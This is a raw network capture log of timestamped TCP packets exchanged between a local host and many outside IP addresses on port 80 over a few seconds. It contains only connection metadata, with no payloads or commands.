                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770697117 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770726919 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770756006 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770797968 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770823956 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770850897 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770876884 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770895004 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770895004 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770895004 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770904064 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770983934 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770983934 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.771509886 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.771537066 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.771574974 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.771605968 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.815567017 CEST8049920188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.815601110 CEST8049920188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.815700054 CEST4992080192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.816520929 CEST4992080192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.863713026 CEST804991852.71.57.184192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.880991936 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881028891 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881055117 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881083965 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881114960 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881268978 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881303072 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881331921 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881344080 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881397963 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881408930 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881439924 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881447077 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.881494999 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.882289886 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.882328033 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.882414103 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.882414103 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.882443905 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.882472992 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.882474899 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.882519007 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.882551908 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.883243084 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.883290052 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.883321047 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.883342028 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.883358002 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.883358955 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.883392096 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.883395910 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.883428097 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.883460999 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.884228945 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.884255886 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.884320974 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.884329081 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.884345055 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.884403944 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.920233011 CEST8049904135.181.73.98192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.920341969 CEST4990480192.168.2.4135.181.73.98
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.959243059 CEST4992080192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.975719929 CEST8049920188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990281105 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990331888 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990367889 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990401030 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990438938 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990540981 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990605116 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990632057 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990665913 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990706921 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990787983 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990931034 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.990955114 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.991007090 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.991029024 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.991034031 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.991053104 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.991079092 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.991117001 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.991158962 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.991954088 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.991976023 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.992002010 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.992029905 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.992046118 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.992057085 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.992101908 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.992121935 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.992975950 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.993004084 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.993026972 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.993052006 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.993082047 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.993210077 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.993249893 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.993884087 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.993905067 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.993927002 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.993977070 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.993980885 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.994007111 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.994012117 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.994050980 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.994076014 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.994864941 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.994888067 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.994910955 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.994954109 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.994962931 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.994982958 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.995001078 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.995040894 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.995893002 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.995973110 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.995994091 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996021032 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996049881 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996049881 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996073008 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996102095 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996861935 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996896982 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996926069 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996941090 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996954918 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996965885 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996982098 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.996994972 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.997025967 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.997041941 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.997790098 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.997823954 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.997852087 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.997876883 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.997915983 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.997955084 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.056313038 CEST4992180192.168.2.472.44.93.236
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.092180014 CEST8049920188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.092219114 CEST8049920188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.092328072 CEST4992080192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.092370987 CEST4992080192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.099881887 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.099924088 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.099951029 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.099977016 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100001097 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100121021 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100162983 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100184917 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100214958 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100240946 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100290060 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100315094 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100315094 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100318909 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100342989 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.100374937 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101109028 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101141930 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101172924 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101212978 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101438999 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101475000 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101497889 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101535082 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101574898 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101826906 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101857901 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101883888 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101911068 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101928949 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101950884 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.101977110 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.102004051 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.102864027 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.102896929 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.102926970 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.102948904 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.102955103 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.102983952 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.102988005 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.103027105 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.103060961 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.103687048 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.103717089 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.103744030 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.103770971 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.103790045 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.103796959 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.103826046 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.103868961 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.104593992 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.104687929 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.138004065 CEST4989780192.168.2.4193.166.255.171
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.182188988 CEST804992172.44.93.236192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.185051918 CEST4992180192.168.2.472.44.93.236
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.243585110 CEST804983596.127.180.42192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.244144917 CEST4983580192.168.2.496.127.180.42
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.372999907 CEST4992180192.168.2.472.44.93.236
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.473114014 CEST4992280192.168.2.423.227.38.74
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.479470015 CEST4992380192.168.2.469.163.218.51
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.489321947 CEST804992223.227.38.74192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.489521980 CEST4992280192.168.2.423.227.38.74
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.489970922 CEST4992280192.168.2.423.227.38.74
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.496670961 CEST804992172.44.93.236192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.498012066 CEST804992172.44.93.236192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.498044968 CEST804992172.44.93.236192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.498106956 CEST4992180192.168.2.472.44.93.236
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.498153925 CEST4992180192.168.2.472.44.93.236
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.506063938 CEST804992223.227.38.74192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.604809046 CEST804983596.127.180.42192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.605046034 CEST4983580192.168.2.496.127.180.42
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.644031048 CEST804992369.163.218.51192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.644284964 CEST4992380192.168.2.469.163.218.51
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.644608021 CEST4992380192.168.2.469.163.218.51
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.659898996 CEST4992480192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.662771940 CEST804992223.227.38.74192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.663280964 CEST4992280192.168.2.423.227.38.74
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.714474916 CEST8049871208.109.214.162192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.716938019 CEST4987180192.168.2.4208.109.214.162
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.755518913 CEST4992580192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.778476954 CEST4992680192.168.2.4195.78.66.50
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.803786993 CEST8049924104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.804052114 CEST4992480192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.804555893 CEST4992480192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.809186935 CEST804992369.163.218.51192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.810223103 CEST804992369.163.218.51192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.810447931 CEST4992380192.168.2.469.163.218.51
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.810726881 CEST804992369.163.218.51192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.810910940 CEST4992380192.168.2.469.163.218.51
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.844592094 CEST4992380192.168.2.469.163.218.51
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.845472097 CEST4992780192.168.2.469.163.218.51
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.943763971 CEST8049925154.203.14.100192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.944031000 CEST4992580192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.945198059 CEST4992580192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.947679043 CEST8049924104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.948299885 CEST8049924104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.948457003 CEST4992480192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.965392113 CEST804983596.127.180.42192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.970606089 CEST4983580192.168.2.496.127.180.42
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.973532915 CEST8049820202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.975898981 CEST4992480192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.975945950 CEST4982080192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.008084059 CEST804987662.122.190.121192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.008336067 CEST4987680192.168.2.462.122.190.121
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.009177923 CEST804992369.163.218.51192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.010195017 CEST804992769.163.218.51192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.010349035 CEST4992780192.168.2.469.163.218.51
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.010983944 CEST4992780192.168.2.469.163.218.51
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.028968096 CEST4990580192.168.2.4210.140.73.39
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.078541994 CEST4992880192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.102165937 CEST8049928217.19.237.54192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.103032112 CEST4992880192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.103404999 CEST4992880192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.119200945 CEST8049924104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.119647980 CEST8049924104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.119754076 CEST4992480192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.126928091 CEST8049928217.19.237.54192.168.2.4
